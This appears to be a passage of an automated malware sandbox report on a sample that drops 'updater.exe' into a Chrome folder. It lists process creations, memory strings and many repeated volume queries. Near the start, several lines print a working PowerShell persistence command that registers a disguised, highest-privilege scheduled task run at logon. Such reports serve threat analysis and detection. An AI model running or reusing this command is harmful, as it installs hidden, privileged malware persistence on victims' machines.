                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,4_2_00007FF78AB31C64
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,4_2_00007FF78AB31C64
                Source: dwm.exe, 0000000A.00000000.1758015033.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000A.00000002.3032503633.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6214A0 cpuid 7_2_00000225DC6214A0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
